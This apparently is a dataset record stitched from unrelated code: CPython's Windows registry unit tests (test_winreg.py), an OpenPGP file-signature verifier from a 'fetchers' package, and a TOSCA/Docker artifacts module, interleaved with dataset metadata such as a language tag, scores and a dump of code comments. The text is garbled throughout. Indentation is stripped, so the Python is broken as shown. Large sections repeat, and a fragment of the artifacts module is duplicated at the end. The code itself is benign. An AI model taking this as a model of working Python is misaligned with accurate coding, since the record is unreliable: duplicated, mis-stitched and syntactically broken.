# Test for Issue #14420, accept proper ranges for SetValueEx.
# Py2Reg, which gets called by SetValueEx, was using PyLong_AsLong,
# thus raising OverflowError. The implementation now uses
# PyLong_AsUnsignedLong to match DWORD's size.
try:
with CreateKey(HKEY_CURRENT_USER, test_key_name) as ck:
self.assertNotEqual(ck.handle, 0)
SetValueEx(ck, "test_name", None, REG_DWORD, 0x80000000)
finally:
DeleteKey(HKEY_CURRENT_USER, test_key_name)
def test_queryvalueex_return_value(self):
# Test for Issue #16759, return unsigned int from QueryValueEx.
# Reg2Py, which gets called by QueryValueEx, was returning a value
# generated by PyLong_FromLong. The implmentation now uses
# PyLong_FromUnsignedLong to match DWORD's size.
try:
with CreateKey(HKEY_CURRENT_USER, test_key_name) as ck:
self.assertNotEqual(ck.handle, 0)
test_val = 0x80000000
SetValueEx(ck, "test_name", None, REG_DWORD, test_val)
ret_val, ret_type = QueryValueEx(ck, "test_name")
self.assertEqual(ret_type, REG_DWORD)
self.assertEqual(ret_val, test_val)
finally:
DeleteKey(HKEY_CURRENT_USER, test_key_name)
@unittest.skipUnless(REMOTE_NAME, "Skipping remote registry tests")
class RemoteWinregTests(BaseWinregTests):
def test_remote_registry_works(self):
remote_key = ConnectRegistry(REMOTE_NAME, HKEY_CURRENT_USER)
self._test_all(remote_key)
@unittest.skipUnless(WIN64_MACHINE, "x64 specific registry tests")
class Win64WinregTests(BaseWinregTests):
def test_reflection_functions(self):
# Test that we can call the query, enable, and disable functions
# on a key which isn't on the reflection list with no consequences.
with OpenKey(HKEY_LOCAL_MACHINE, "Software") as key:
# HKLM\Software is redirected but not reflected in all OSes
self.assertTrue(QueryReflectionKey(key))
self.assertEqual(None, EnableReflectionKey(key))
self.assertEqual(None, DisableReflectionKey(key))
self.assertTrue(QueryReflectionKey(key))
@unittest.skipUnless(HAS_REFLECTION, "OS doesn't support reflection")
def test_reflection(self):
# Test that we can create, open, and delete keys in the 32-bit
# area. Because we are doing this in a key which gets reflected,
# test the differences of 32 and 64-bit keys before and after the
# reflection occurs (ie. when the created key is closed).
try:
with CreateKeyEx(HKEY_CURRENT_USER, test_reflect_key_name, 0,
KEY_ALL_ACCESS | KEY_WOW64_32KEY) as created_key:
self.assertNotEqual(created_key.handle, 0)
# The key should now be available in the 32-bit area
with OpenKey(HKEY_CURRENT_USER, test_reflect_key_name, 0,
KEY_ALL_ACCESS | KEY_WOW64_32KEY) as key:
self.assertNotEqual(key.handle, 0)
# Write a value to what currently is only in the 32-bit area
SetValueEx(created_key, "", 0, REG_SZ, "32KEY")
# The key is not reflected until created_key is closed.
# The 64-bit version of the key should not be available yet.
open_fail = lambda: OpenKey(HKEY_CURRENT_USER,
test_reflect_key_name, 0,
KEY_READ | KEY_WOW64_64KEY)
self.assertRaises(WindowsError, open_fail)
# Now explicitly open the 64-bit version of the key
with OpenKey(HKEY_CURRENT_USER, test_reflect_key_name, 0,
KEY_ALL_ACCESS | KEY_WOW64_64KEY) as key:
self.assertNotEqual(key.handle, 0)
# Make sure the original value we set is there
self.assertEqual("32KEY", QueryValue(key, ""))
# Set a new value, which will get reflected to 32-bit
SetValueEx(key, "", 0, REG_SZ, "64KEY")
# Reflection uses a "last-writer wins policy, so the value we set
# on the 64-bit key should be the same on 32-bit
with OpenKey(HKEY_CURRENT_USER, test_reflect_key_name, 0,
KEY_READ | KEY_WOW64_32KEY) as key:
self.assertEqual("64KEY", QueryValue(key, ""))
finally:
DeleteKeyEx(HKEY_CURRENT_USER, test_reflect_key_name,
KEY_WOW64_32KEY, 0)
@unittest.skipUnless(HAS_REFLECTION, "OS doesn't support reflection")
def test_disable_reflection(self):
# Make use of a key which gets redirected and reflected
try:
with CreateKeyEx(HKEY_CURRENT_USER, test_reflect_key_name, 0,
KEY_ALL_ACCESS | KEY_WOW64_32KEY) as created_key:
# QueryReflectionKey returns whether or not the key is disabled
disabled = QueryReflectionKey(created_key)
self.assertEqual(type(disabled), bool)
# HKCU\Software\Classes is reflected by default
self.assertFalse(disabled)
DisableReflectionKey(created_key)
self.assertTrue(QueryReflectionKey(created_key))
# The key is now closed and would normally be reflected to the
# 64-bit area, but let's make sure that didn't happen.
open_fail = lambda: OpenKeyEx(HKEY_CURRENT_USER,
test_reflect_key_name, 0,
KEY_READ | KEY_WOW64_64KEY)
self.assertRaises(WindowsError, open_fail)
# Make sure the 32-bit key is actually there
with OpenKeyEx(HKEY_CURRENT_USER, test_reflect_key_name, 0,
KEY_READ | KEY_WOW64_32KEY) as key:
self.assertNotEqual(key.handle, 0)
finally:
DeleteKeyEx(HKEY_CURRENT_USER, test_reflect_key_name,
KEY_WOW64_32KEY, 0)
def test_exception_numbers(self):
with self.assertRaises(WindowsError) as ctx:
QueryValue(HKEY_CLASSES_ROOT, 'some_value_that_does_not_exist')
self.assertEqual(ctx.exception.errno, 2)
def test_main():
test_support.run_unittest(LocalWinregTests, RemoteWinregTests,
Win64WinregTests)
if __name__ == "__main__":
if not REMOTE_NAME:
print "Remote registry calls can be tested using",
print "'test_winreg.py --remote \\\\machine_name'"
test_main()
|
# Test the windows specific win32reg module.
# Only win32reg functions not hit here: FlushKey, LoadKey and SaveKey
import os, sys, errno
import unittest
from test import test_support
threading = test_support.import_module("threading")
from platform import machine
# Do this first so test will be skipped if module doesn't exist
test_support.import_module('_winreg')
# Now import everything
from _winreg import *
try:
REMOTE_NAME = sys.argv[sys.argv.index("--remote")+1]
except (IndexError, ValueError):
REMOTE_NAME = None
# tuple of (major, minor)
WIN_VER = sys.getwindowsversion()[:2]
# Some tests should only run on 64-bit architectures where WOW64 will be.
WIN64_MACHINE = True if machine() == "AMD64" else False
# Starting with Windows 7 and Windows Server 2008 R2, WOW64 no longer uses
# registry reflection and formerly reflected keys are shared instead.
# Windows 7 and Windows Server 2008 R2 are version 6.1. Due to this, some
# tests are only valid up until 6.1
HAS_REFLECTION = True if WIN_VER < (6, 1) else False
# Use a per-process key to prevent concurrent test runs (buildbot!) from
# stomping on each other.
test_key_base = "Python Test Key [%d] - Delete Me" % (os.getpid(),)
test_key_name = "SOFTWARE\\" + test_key_base
# On OS'es that support reflection we should test with a reflected key
test_reflect_key_name = "SOFTWARE\\Classes\\" + test_key_base
test_data = [
("Int Value", 45, REG_DWORD),
("String Val", "A string value", REG_SZ),
("StringExpand", "The path is %path%", REG_EXPAND_SZ),
("Multi-string", ["Lots", "of", "string", "values"], REG_MULTI_SZ),
("Raw Data", ("binary"+chr(0)+"data"), REG_BINARY),
("Big String", "x"*(2**14-1), REG_SZ),
("Big Binary", "x"*(2**14), REG_BINARY),
]
if test_support.have_unicode:
test_data += [
(unicode("Unicode Val"), unicode("A Unicode value"), REG_SZ,),
("UnicodeExpand", unicode("The path is %path%"), REG_EXPAND_SZ),
("Multi-unicode", [unicode("Lots"), unicode("of"), unicode("unicode"),
unicode("values")], REG_MULTI_SZ),
("Multi-mixed", [unicode("Unicode"), unicode("and"), "string",
"values"], REG_MULTI_SZ),
]
class BaseWinregTests(unittest.TestCase):
def setUp(self):
# Make sure that the test key is absent when the test
# starts.
self.delete_tree(HKEY_CURRENT_USER, test_key_name)
def delete_tree(self, root, subkey):
try:
hkey = OpenKey(root, subkey, KEY_ALL_ACCESS)
except WindowsError:
# subkey does not exist
return
while True:
try:
subsubkey = EnumKey(hkey, 0)
except WindowsError:
# no more subkeys
break
self.delete_tree(hkey, subsubkey)
CloseKey(hkey)
DeleteKey(root, subkey)
def _write_test_data(self, root_key, CreateKey=CreateKey):
# Set the default value for this key.
SetValue(root_key, test_key_name, REG_SZ, "Default value")
key = CreateKey(root_key, test_key_name)
# Create a sub-key
sub_key = CreateKey(key, "sub_key")
# Give the sub-key some named values
for value_name, value_data, value_type in test_data:
SetValueEx(sub_key, value_name, 0, value_type, value_data)
# Check we wrote as many items as we thought.
nkeys, nvalues, since_mod = QueryInfoKey(key)
self.assertEqual(nkeys, 1, "Not the correct number of sub keys")
self.assertEqual(nvalues, 1, "Not the correct number of values")
nkeys, nvalues, since_mod = QueryInfoKey(sub_key)
self.assertEqual(nkeys, 0, "Not the correct number of sub keys")
self.assertEqual(nvalues, len(test_data),
"Not the correct number of values")
# Close this key this way...
# (but before we do, copy the key as an integer - this allows
# us to test that the key really gets closed).
int_sub_key = int(sub_key)
CloseKey(sub_key)
try:
QueryInfoKey(int_sub_key)
self.fail("It appears the CloseKey() function does "
"not close the actual key!")
except EnvironmentError:
pass
# ... and close that key that way :-)
int_key = int(key)
key.Close()
try:
QueryInfoKey(int_key)
self.fail("It appears the key.Close() function "
"does not close the actual key!")
except EnvironmentError:
pass
def _read_test_data(self, root_key, OpenKey=OpenKey):
# Check we can get default value for this key.
val = QueryValue(root_key, test_key_name)
self.assertEqual(val, "Default value",
"Registry didn't give back the correct value")
key = OpenKey(root_key, test_key_name)
# Read the sub-keys
with OpenKey(key, "sub_key") as sub_key:
# Check I can enumerate over the values.
index = 0
while 1:
try:
data = EnumValue(sub_key, index)
except EnvironmentError:
break
self.assertIn(data, test_data,
"Didn't read back the correct test data")
index = index + 1
self.assertEqual(index, len(test_data),
"Didn't read the correct number of items")
# Check I can directly access each item
for value_name, value_data, value_type in test_data:
read_val, read_typ = QueryValueEx(sub_key, value_name)
self.assertEqual(read_val, value_data,
"Could not directly read the value")
self.assertEqual(read_typ, value_type,
"Could not directly read the value")
sub_key.Close()
# Enumerate our main key.
read_val = EnumKey(key, 0)
self.assertEqual(read_val, "sub_key", "Read subkey value wrong")
try:
EnumKey(key, 1)
self.fail("Was able to get a second key when I only have one!")
except EnvironmentError:
pass
key.Close()
def _delete_test_data(self, root_key):
key = OpenKey(root_key, test_key_name, 0, KEY_ALL_ACCESS)
sub_key = OpenKey(key, "sub_key", 0, KEY_ALL_ACCESS)
# It is not necessary to delete the values before deleting
# the key (although subkeys must not exist). We delete them
# manually just to prove we can :-)
for value_name, value_data, value_type in test_data:
DeleteValue(sub_key, value_name)
nkeys, nvalues, since_mod = QueryInfoKey(sub_key)
self.assertEqual(nkeys, 0, "subkey not empty before delete")
self.assertEqual(nvalues, 0, "subkey not empty before delete")
sub_key.Close()
DeleteKey(key, "sub_key")
try:
# Shouldnt be able to delete it twice!
DeleteKey(key, "sub_key")
self.fail("Deleting the key twice succeeded")
except EnvironmentError:
pass
key.Close()
DeleteKey(root_key, test_key_name)
# Opening should now fail!
try:
key = OpenKey(root_key, test_key_name)
self.fail("Could open the non-existent key")
except WindowsError: # Use this error name this time
pass
def _test_all(self, root_key):
self._write_test_data(root_key)
self._read_test_data(root_key)
self._delete_test_data(root_key)
class LocalWinregTests(BaseWinregTests):
def test_registry_works(self):
self._test_all(HKEY_CURRENT_USER)
def test_registry_works_extended_functions(self):
# Substitute the regular CreateKey and OpenKey calls with their
# extended counterparts.
# Note: DeleteKeyEx is not used here because it is platform dependent
cke = lambda key, sub_key: CreateKeyEx(key, sub_key, 0, KEY_ALL_ACCESS)
self._write_test_data(HKEY_CURRENT_USER, cke)
oke = lambda key, sub_key: OpenKeyEx(key, sub_key, 0, KEY_READ)
self._read_test_data(HKEY_CURRENT_USER, oke)
self._delete_test_data(HKEY_CURRENT_USER)
def test_connect_registry_to_local_machine_works(self):
# perform minimal ConnectRegistry test which just invokes it
h = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
self.assertNotEqual(h.handle, 0)
h.Close()
self.assertEqual(h.handle, 0)
def test_inexistant_remote_registry(self):
connect = lambda: ConnectRegistry("abcdefghijkl", HKEY_CURRENT_USER)
self.assertRaises(WindowsError, connect)
def test_expand_environment_strings(self):
r = ExpandEnvironmentStrings(u"%windir%\\test")
self.assertEqual(type(r), unicode)
self.assertEqual(r, os.environ["windir"] + "\\test")
def test_context_manager(self):
# ensure that the handle is closed if an exception occurs
try:
with ConnectRegistry(None, HKEY_LOCAL_MACHINE) as h:
self.assertNotEqual(h.handle, 0)
raise WindowsError
except WindowsError:
self.assertEqual(h.handle, 0)
def test_changing_value(self):
# Issue2810: A race condition in 2.6 and 3.1 may cause
# EnumValue or QueryValue to raise "WindowsError: More data is
# available"
done = False
class VeryActiveThread(threading.Thread):
def run(self):
with CreateKey(HKEY_CURRENT_USER, test_key_name) as key:
use_short = True
long_string = 'x'*2000
while not done:
s = 'x' if use_short else long_string
use_short = not use_short
SetValue(key, 'changing_value', REG_SZ, s)
thread = VeryActiveThread()
thread.start()
try:
with CreateKey(HKEY_CURRENT_USER,
test_key_name+'\\changing_value') as key:
for _ in range(1000):
num_subkeys, num_values, t = QueryInfoKey(key)
for i in range(num_values):
name = EnumValue(key, i)
QueryValue(key, name[0])
finally:
done = True
thread.join()
with OpenKey(HKEY_CURRENT_USER, test_key_name, 0, KEY_ALL_ACCESS) as key:
DeleteKey(key, 'changing_value')
DeleteKey(HKEY_CURRENT_USER, test_key_name)
def test_long_key(self):
# Issue2810, in 2.6 and 3.1 when the key name was exactly 256
# characters, EnumKey raised "WindowsError: More data is
# available"
name = 'x'*256
try:
with CreateKey(HKEY_CURRENT_USER, test_key_name) as key:
SetValue(key, name, REG_SZ, 'x')
num_subkeys, num_values, t = QueryInfoKey(key)
EnumKey(key, 0)
finally:
with OpenKey(HKEY_CURRENT_USER, test_key_name, 0, KEY_ALL_ACCESS) as key:
DeleteKey(key, name)
DeleteKey(HKEY_CURRENT_USER, test_key_name)
def test_dynamic_key(self):
# Issue2810, when the value is dynamically generated, these
# raise "WindowsError: More data is available" in 2.6 and 3.1
try:
EnumValue(HKEY_PERFORMANCE_DATA, 0)
except OSError as e:
if e.errno in (errno.EPERM, errno.EACCES):
self.skipTest("access denied to registry key "
"(are you running in a non-interactive session?)")
raise
QueryValueEx(HKEY_PERFORMANCE_DATA, None)
# Reflection requires XP x64/Vista at a minimum. XP doesn't have this stuff
# or DeleteKeyEx so make sure their use raises NotImplementedError
@unittest.skipUnless(WIN_VER < (5, 2), "Requires Windows XP")
def test_reflection_unsupported(self):
try:
with CreateKey(HKEY_CURRENT_USER, test_key_name) as ck:
self.assertNotEqual(ck.handle, 0)
key = OpenKey(HKEY_CURRENT_USER, test_key_name)
self.assertNotEqual(key.handle, 0)
with self.assertRaises(NotImplementedError):
DisableReflectionKey(key)
with self.assertRaises(NotImplementedError):
EnableReflectionKey(key)
with self.assertRaises(NotImplementedError):
QueryReflectionKey(key)
with self.assertRaises(NotImplementedError):
DeleteKeyEx(HKEY_CURRENT_USER, test_key_name)
finally:
DeleteKey(HKEY_CURRENT_USER, test_key_name)
def test_setvalueex_value_range(self):
# Test for Issue #14420, accept proper ranges for SetValueEx.
# Py2Reg, which gets called by SetValueEx, was using PyLong_AsLong,
# thus raising OverflowError. The implementation now uses
# PyLong_AsUnsignedLong to match DWORD's size.
try:
with CreateKey(HKEY_CURRENT_USER, test_key_name) as ck:
self.assertNotEqual(ck.handle, 0)
SetValueEx(ck, "test_name", None, REG_DWORD, 0x80000000)
finally:
DeleteKey(HKEY_CURRENT_USER, test_key_name)
def test_queryvalueex_return_value(self):
# Test for Issue #16759, return unsigned int from QueryValueEx.
# Reg2Py, which gets called by QueryValueEx, was returning a value
# generated by PyLong_FromLong. The implmentation now uses
# PyLong_FromUnsignedLong to match DWORD's size.
try:
with CreateKey(HKEY_CURRENT_USER, test_key_name) as ck:
self.assertNotEqual(ck.handle, 0)
test_val = 0x80000000
SetValueEx(ck, "test_name", None, REG_DWORD, test_val)
ret_val, ret_type = QueryValueEx(ck, "test_name")
self.assertEqual(ret_type, REG_DWORD)
self.assertEqual(ret_val, test_val)
finally:
DeleteKey(HKEY_CURRENT_USER, test_key_name)
@unittest.skipUnless(REMOTE_NAME, "Skipping remote registry tests")
class RemoteWinregTests(BaseWinregTests):
def test_remote_registry_works(self):
remote_key = ConnectRegistry(REMOTE_NAME, HKEY_CURRENT_USER)
self._test_all(remote_key)
@unittest.skipUnless(WIN64_MACHINE, "x64 specific registry tests")
class Win64WinregTests(BaseWinregTests):
def test_reflection_functions(self):
# Test that we can call the query, enable, and disable functions
# on a key which isn't on the reflection list with no consequences.
with OpenKey(HKEY_LOCAL_MACHINE, "Software") as key:
# HKLM\Software is redirected but not reflected in all OSes
self.assertTrue(QueryReflectionKey(key))
self.assertEqual(None, EnableReflectionKey(key))
self.assertEqual(None, DisableReflectionKey(key))
self.assertTrue(QueryReflectionKey(key))
@unittest.skipUnless(HAS_REFLECTION, "OS doesn't support reflection")
def test_reflection(self):
# Test that we can create, open, and delete keys in the 32-bit
# area. Because we are doing this in a key which gets reflected,
# test the differences of 32 and 64-bit keys before and after the
# reflection occurs (ie. when the created key is closed).
try:
with CreateKeyEx(HKEY_CURRENT_USER, test_reflect_key_name, 0,
KEY_ALL_ACCESS | KEY_WOW64_32KEY) as created_key:
self.assertNotEqual(created_key.handle, 0)
# The key should now be available in the 32-bit area
with OpenKey(HKEY_CURRENT_USER, test_reflect_key_name, 0,
KEY_ALL_ACCESS | KEY_WOW64_32KEY) as key:
self.assertNotEqual(key.handle, 0)
# Write a value to what currently is only in the 32-bit area
SetValueEx(created_key, "", 0, REG_SZ, "32KEY")
# The key is not reflected until created_key is closed.
# The 64-bit version of the key should not be available yet.
open_fail = lambda: OpenKey(HKEY_CURRENT_USER,
test_reflect_key_name, 0,
KEY_READ | KEY_WOW64_64KEY)
self.assertRaises(WindowsError, open_fail)
# Now explicitly open the 64-bit version of the key
with OpenKey(HKEY_CURRENT_USER, test_reflect_key_name, 0,
KEY_ALL_ACCESS | KEY_WOW64_64KEY) as key:
self.assertNotEqual(key.handle, 0)
# Make sure the original value we set is there
self.assertEqual("32KEY", QueryValue(key, ""))
# Set a new value, which will get reflected to 32-bit
SetValueEx(key, "", 0, REG_SZ, "64KEY")
# Reflection uses a "last-writer wins policy, so the value we set
# on the 64-bit key should be the same on 32-bit
with OpenKey(HKEY_CURRENT_USER, test_reflect_key_name, 0,
KEY_READ | KEY_WOW64_32KEY) as key:
self.assertEqual("64KEY", QueryValue(key, ""))
finally:
DeleteKeyEx(HKEY_CURRENT_USER, test_reflect_key_name,
KEY_WOW64_32KEY, 0)
@unittest.skipUnless(HAS_REFLECTION, "OS doesn't support reflection")
def test_disable_reflection(self):
# Make use of a key which gets redirected and reflected
try:
with CreateKeyEx(HKEY_CURRENT_USER, test_reflect_key_name, 0,
KEY_ALL_ACCESS | KEY_WOW64_32KEY) as created_key:
# QueryReflectionKey returns whether or not the key is disabled
disabled = QueryReflectionKey(created_key)
self.assertEqual(type(disabled), bool)
# HKCU\Software\Classes is reflected by default
self.assertFalse(disabled)
DisableReflectionKey(created_key)
self.assertTrue(QueryReflectionKey(created_key))
# The key is now closed and would normally be reflected to the
# 64-bit area, but let's make sure that didn't happen.
open_fail = lambda: OpenKeyEx(HKEY_CURRENT_USER,
test_reflect_key_name, 0,
KEY_READ | KEY_WOW64_64KEY)
self.assertRaises(WindowsError, open_fail)
# Make sure the 32-bit key is actually there
with OpenKeyEx(HKEY_CURRENT_USER, test_reflect_key_name, 0,
KEY_READ | KEY_WOW64_32KEY) as key:
self.assertNotEqual(key.handle, 0)
finally:
DeleteKeyEx(HKEY_CURRENT_USER, test_reflect_key_name,
KEY_WOW64_32KEY, 0)
def test_exception_numbers(self):
with self.assertRaises(WindowsError) as ctx:
QueryValue(HKEY_CLASSES_ROOT, 'some_value_that_does_not_exist')
self.assertEqual(ctx.exception.errno, 2)
def test_main():
test_support.run_unittest(LocalWinregTests, RemoteWinregTests,
Win64WinregTests)
if __name__ == "__main__":
if not REMOTE_NAME:
print "Remote registry calls can be tested using",
print "'test_winreg.py --remote \\\\machine_name'"
test_main()
|
en
| 0.893769
|
# Test the windows specific win32reg module. # Only win32reg functions not hit here: FlushKey, LoadKey and SaveKey # Do this first so test will be skipped if module doesn't exist # Now import everything # tuple of (major, minor) # Some tests should only run on 64-bit architectures where WOW64 will be. # Starting with Windows 7 and Windows Server 2008 R2, WOW64 no longer uses # registry reflection and formerly reflected keys are shared instead. # Windows 7 and Windows Server 2008 R2 are version 6.1. Due to this, some # tests are only valid up until 6.1 # Use a per-process key to prevent concurrent test runs (buildbot!) from # stomping on each other. # On OS'es that support reflection we should test with a reflected key # Make sure that the test key is absent when the test # starts. # subkey does not exist # no more subkeys # Set the default value for this key. # Create a sub-key # Give the sub-key some named values # Check we wrote as many items as we thought. # Close this key this way... # (but before we do, copy the key as an integer - this allows # us to test that the key really gets closed). # ... and close that key that way :-) # Check we can get default value for this key. # Read the sub-keys # Check I can enumerate over the values. # Check I can directly access each item # Enumerate our main key. # It is not necessary to delete the values before deleting # the key (although subkeys must not exist). We delete them # manually just to prove we can :-) # Shouldnt be able to delete it twice! # Opening should now fail! # Use this error name this time # Substitute the regular CreateKey and OpenKey calls with their # extended counterparts. # Note: DeleteKeyEx is not used here because it is platform dependent # perform minimal ConnectRegistry test which just invokes it # ensure that the handle is closed if an exception occurs # Issue2810: A race condition in 2.6 and 3.1 may cause # EnumValue or QueryValue to raise "WindowsError: More data is # available" # Issue2810, in 2.6 and 3.1 when the key name was exactly 256 # characters, EnumKey raised "WindowsError: More data is # available" # Issue2810, when the value is dynamically generated, these # raise "WindowsError: More data is available" in 2.6 and 3.1 # Reflection requires XP x64/Vista at a minimum. XP doesn't have this stuff # or DeleteKeyEx so make sure their use raises NotImplementedError # Test for Issue #14420, accept proper ranges for SetValueEx. # Py2Reg, which gets called by SetValueEx, was using PyLong_AsLong, # thus raising OverflowError. The implementation now uses # PyLong_AsUnsignedLong to match DWORD's size. # Test for Issue #16759, return unsigned int from QueryValueEx. # Reg2Py, which gets called by QueryValueEx, was returning a value # generated by PyLong_FromLong. The implmentation now uses # PyLong_FromUnsignedLong to match DWORD's size. # Test that we can call the query, enable, and disable functions # on a key which isn't on the reflection list with no consequences. # HKLM\Software is redirected but not reflected in all OSes # Test that we can create, open, and delete keys in the 32-bit # area. Because we are doing this in a key which gets reflected, # test the differences of 32 and 64-bit keys before and after the # reflection occurs (ie. when the created key is closed). # The key should now be available in the 32-bit area # Write a value to what currently is only in the 32-bit area # The key is not reflected until created_key is closed. # The 64-bit version of the key should not be available yet. # Now explicitly open the 64-bit version of the key # Make sure the original value we set is there # Set a new value, which will get reflected to 32-bit # Reflection uses a "last-writer wins policy, so the value we set # on the 64-bit key should be the same on 32-bit # Make use of a key which gets redirected and reflected # QueryReflectionKey returns whether or not the key is disabled # HKCU\Software\Classes is reflected by default # The key is now closed and would normally be reflected to the # 64-bit area, but let's make sure that didn't happen. # Make sure the 32-bit key is actually there
| 2.129838
| 2
|
fetchers/verifiers/OpenPGP.py
|
KOLANICH/fetchers.py
| 1
|
6628540
|
<reponame>KOLANICH/fetchers.py<filename>fetchers/verifiers/OpenPGP.py
import typing
from pathlib import Path
from . import Verifier
class OpenPGPVerifier(Verifier):
__slots__ = ("files2verify", "pgpBackend")
marker = "OpenPGP"
def __init__(self, files2verify: typing.Iterable[typing.Tuple[bytes, bytes]], backend=None) -> None:
self.files2verify = files2verify
if backend is None:
from OpenPGPAbs import ChosenBackend
backend = ChosenBackend
self.pgpBackend = backend()
def __call__(self, downloadsDir: Path, downloadedTargets: typing.Iterable[str]) -> None:
downloadedTargetsNames = set(downloadedTargets)
def preprocessFile(f):
nonlocal downloadedTargetsNames
if isinstance(f, str):
f = downloadsDir / f
if isinstance(f, Path):
f = f.read_bytes()
elif isinstance(f, tuple):
(name, f) = f
downloadedTargetsNames -= {name}
return f
for file2Verify, signature, fingerprint, keyFile in self.files2verify:
file2Verify = preprocessFile(file2Verify)
signature = preprocessFile(signature)
self.pgpBackend.verifyBlob(file2Verify, signature, keyFingerprint=fingerprint, keyFile=keyFile)
if downloadedTargetsNames:
raise Exception("Unverified files:", downloadedTargetsNames)
|
import typing
from pathlib import Path
from . import Verifier
class OpenPGPVerifier(Verifier):
__slots__ = ("files2verify", "pgpBackend")
marker = "OpenPGP"
def __init__(self, files2verify: typing.Iterable[typing.Tuple[bytes, bytes]], backend=None) -> None:
self.files2verify = files2verify
if backend is None:
from OpenPGPAbs import ChosenBackend
backend = ChosenBackend
self.pgpBackend = backend()
def __call__(self, downloadsDir: Path, downloadedTargets: typing.Iterable[str]) -> None:
downloadedTargetsNames = set(downloadedTargets)
def preprocessFile(f):
nonlocal downloadedTargetsNames
if isinstance(f, str):
f = downloadsDir / f
if isinstance(f, Path):
f = f.read_bytes()
elif isinstance(f, tuple):
(name, f) = f
downloadedTargetsNames -= {name}
return f
for file2Verify, signature, fingerprint, keyFile in self.files2verify:
file2Verify = preprocessFile(file2Verify)
signature = preprocessFile(signature)
self.pgpBackend.verifyBlob(file2Verify, signature, keyFingerprint=fingerprint, keyFile=keyFile)
if downloadedTargetsNames:
raise Exception("Unverified files:", downloadedTargetsNames)
|
none
| 1
| 2.762673
| 3
|
|
isic/ingest/models/metadata_file.py
|
ImageMarkup/isic
| 0
|
6628541
|
<filename>isic/ingest/models/metadata_file.py
from typing import Optional
from django.contrib.auth.models import User
from django.core.validators import FileExtensionValidator
from django.db import models
from django.db.models.query import QuerySet
import numpy as np
import pandas as pd
from s3_file_field import S3FileField
from isic.core.models import CreationSortedTimeStampedModel
from .cohort import Cohort
class MetadataFile(CreationSortedTimeStampedModel):
creator = models.ForeignKey(User, on_delete=models.CASCADE)
cohort = models.ForeignKey(Cohort, on_delete=models.CASCADE, related_name='metadata_files')
blob = S3FileField(validators=[FileExtensionValidator(allowed_extensions=['csv'])])
blob_name = models.CharField(max_length=255, editable=False)
blob_size = models.PositiveBigIntegerField(editable=False)
def __str__(self) -> str:
return self.blob_name
def to_df(self):
with self.blob.open() as csv:
df = pd.read_csv(csv, header=0)
# pydantic expects None for the absence of a value, not NaN
df = df.replace({np.nan: None})
return df
class MetadataFilePermissions:
model = MetadataFile
perms = ['view_metadatafile']
filters = {'view_metadatafile': 'view_metadatafile_list'}
@staticmethod
def view_metadatafile_list(
user_obj: User, qs: Optional[QuerySet[MetadataFile]] = None
) -> QuerySet[MetadataFile]:
qs = qs if qs is not None else MetadataFile._default_manager.all()
if user_obj.is_active and user_obj.is_staff:
return qs
elif user_obj.is_active and user_obj.is_authenticated:
return qs.filter(cohort__contributor__owners__in=[user_obj])
else:
return qs.none()
@staticmethod
def view_metadatafile(user_obj, obj):
# TODO: use .contains in django 4
return MetadataFilePermissions.view_metadatafile_list(user_obj).filter(pk=obj.pk).exists()
MetadataFile.perms_class = MetadataFilePermissions
|
<filename>isic/ingest/models/metadata_file.py
from typing import Optional
from django.contrib.auth.models import User
from django.core.validators import FileExtensionValidator
from django.db import models
from django.db.models.query import QuerySet
import numpy as np
import pandas as pd
from s3_file_field import S3FileField
from isic.core.models import CreationSortedTimeStampedModel
from .cohort import Cohort
class MetadataFile(CreationSortedTimeStampedModel):
creator = models.ForeignKey(User, on_delete=models.CASCADE)
cohort = models.ForeignKey(Cohort, on_delete=models.CASCADE, related_name='metadata_files')
blob = S3FileField(validators=[FileExtensionValidator(allowed_extensions=['csv'])])
blob_name = models.CharField(max_length=255, editable=False)
blob_size = models.PositiveBigIntegerField(editable=False)
def __str__(self) -> str:
return self.blob_name
def to_df(self):
with self.blob.open() as csv:
df = pd.read_csv(csv, header=0)
# pydantic expects None for the absence of a value, not NaN
df = df.replace({np.nan: None})
return df
class MetadataFilePermissions:
model = MetadataFile
perms = ['view_metadatafile']
filters = {'view_metadatafile': 'view_metadatafile_list'}
@staticmethod
def view_metadatafile_list(
user_obj: User, qs: Optional[QuerySet[MetadataFile]] = None
) -> QuerySet[MetadataFile]:
qs = qs if qs is not None else MetadataFile._default_manager.all()
if user_obj.is_active and user_obj.is_staff:
return qs
elif user_obj.is_active and user_obj.is_authenticated:
return qs.filter(cohort__contributor__owners__in=[user_obj])
else:
return qs.none()
@staticmethod
def view_metadatafile(user_obj, obj):
# TODO: use .contains in django 4
return MetadataFilePermissions.view_metadatafile_list(user_obj).filter(pk=obj.pk).exists()
MetadataFile.perms_class = MetadataFilePermissions
|
en
| 0.567806
|
# pydantic expects None for the absence of a value, not NaN # TODO: use .contains in django 4
| 1.98784
| 2
|
python/testData/paramInfo/TopLevelOverloadsAndImplementation.py
|
truthiswill/intellij-community
| 2
|
6628542
|
from typing import overload
@overload
def foo(value: None) -> None:
pass
@overload
def foo(value: int) -> str:
pass
@overload
def foo(value: str) -> str:
pass
def foo(value):
return None
foo(<arg1>)
|
from typing import overload
@overload
def foo(value: None) -> None:
pass
@overload
def foo(value: int) -> str:
pass
@overload
def foo(value: str) -> str:
pass
def foo(value):
return None
foo(<arg1>)
|
none
| 1
| 2.928868
| 3
|
|
tosker/graph/artifacts.py
|
lucarin91/tosKer
| 7
|
6628543
|
'''
Artifacts module
'''
class Artifact(object):
def __init__(self, name):
self.name = name
def __str__(self):
return 'Artifact'
#
# def _get_str_name(obj):
# return obj if isinstance(obj, six.string_types) else obj.name
class File(Artifact):
def __init__(self, name, abs_path):
super(File, self).__init__(name)
split_path = abs_path.split('/')
self.path = '/'.join(split_path[:-1])
self.file = split_path[-1]
@property
def file_path(self):
return self.path + '/' + self.file
@property
def format(self):
pass
def __str__(self):
return 'File'
class DockerImage(Artifact):
def __init__(self, attr):
super(DockerImage, self).__init__('')
self.name, self.tag = attr.split(':') if ':' in attr \
else (attr, 'latest')
@property
def format(self):
return '{}:{}'.format(self.name, self.tag)
def __str__(self):
return 'DockerImage'
class DockerImageExecutable(DockerImage):
def __str__(self):
return 'DockerImageExecutable'
class Dockerfile(Artifact):
def __init__(self, attr, dockerfile):
super(Dockerfile, self).__init__('')
self.name, self.tag = attr.split(':') if ':' in attr \
else (attr, 'latest')
self.dockerfile = dockerfile
@property
def format(self):
return '{}:{}'.format(self.name, self.tag)
def __str__(self):
return 'Dockerfile'
class DockerfileExecutable(Dockerfile):
def __str__(self):
return 'DockerfileExecutable'
|
'''
Artifacts module
'''
class Artifact(object):
